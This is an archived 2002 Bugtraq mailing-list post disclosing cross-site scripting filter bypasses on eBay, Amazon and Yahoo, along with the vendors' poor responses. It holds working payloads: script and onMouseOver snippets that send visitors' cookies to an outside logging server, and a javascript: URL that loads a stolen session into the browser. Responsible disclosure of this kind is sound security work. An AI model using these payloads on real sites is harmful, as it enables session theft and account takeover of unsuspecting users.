[23941] in bugtraq
Re: Cross-Site Vulnerabilities (Still) Found in Major Web Sites
daemon@ATHENA.MIT.EDU (Andrew Wason)
Tue Jan 22 15:50:22 2002
Date: 22 Jan 2002 14:10:58 -0000
Message-ID: <20020122141058.20368.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Andrew Wason <aw@rootbin.com>
To: bugtraq@securityfocus.com
In-Reply-To: <EFD4B3AC451FD5118E7400E018C326948275F2@AIRWOLF>
> Yahoo, MSN, AOL, Lycos, and Excite suffer from
such attack.
So do ebay and Amazon. Yahoo will let you post
pretty much any script/html (in invites, auctions etc.).
ebay tries to strip references to document.cookie in
auction postings, but putting whitespace in there fools
it and allows it to be posted, e.g.:
document
.
cookie
Amazon only allows what they call "basic HTML" in
their auction postings, but you can still get script past
their filter e.g.:
<b onMouseOver="new Image
().src='http://demo.rootbin.com:8080/~aw/logger.gif?
cookie=' + escape(document.cookie)">test<b>
When the user mouses over the word test, their
cookies will be logged in my webserves log file.
If a site allows <script> blocks to be posted, you can
log the visitors cookies with no interaction:
<script language="JavaScript">
new Image().src
= "http://demo.rootbin.com:8080/~aw/logger.gif?
cookie=" + escape(document.cookie);
</script>
Yahoo is interesting because they allow script to be
posted in their "Yahoo Invites".
http://invites.yahoo.com/
So you can craft an invitation that logs the users
cookies and have Yahoo email it to the specific
Yahoo users whose accounts you want to access.
I established accounts with each of these (ebay,
Yahoo and Amazon) and was able to collect cookies
on myself and log into that users account by
manually setting those cookies in my browser. Once
you have the cookies (e.g. for amazon), visit
amazon.com and enter this in your browser URL field
(all one line):
javascript:void(document.cookie="session-id-
time=del;expires=Fri, 31 Dec 1999 23:59:59
GMT;domain=amazon.com;");void
(document.cookie="session-id=del;expires=Fri, 31
Dec 1999 23:59:59 GMT;domain=amazon.com;");void
(document.cookie="ubid-main=del;expires=Fri, 31
Dec 1999 23:59:59 GMT;domain=amazon.com;");void
(document.cookie="x-main=del;expires=Fri, 31 Dec
1999 23:59:59 GMT;domain=amazon.com;");void
(document.cookie="ubid-main=002-7079596-
1079533;domain=amazon.com;");void
(document.cookie="x-
main=OCoNWc8jtjGE0wvoNWc8jtjGEU0c?
OkW;domain=amazon.com;")
This first deletes your current session cookies and
then replaces them with another users account
information, logging you in (the account info above is
bogus).
On Yahoo, users can choose how long their
accounts stay logged in before asking for a password
again. So if you enter the Yahoo cookies during the
time the user is logged in (within this window) you
have full access to their email, calendar and a lot
more.
I notified Amazon, Yahoo and ebay a while ago - I had
trouble finding out how to notify them. I ended up
using feedback forms on their sites, and a feedback
email alias at amazon.
Amazon responded saying they use SSL so there's
no problem (?). Yahoo responded with a form letter
directing me to various FAQs, I replied and got no
response. ebay did not respond.
Andrew
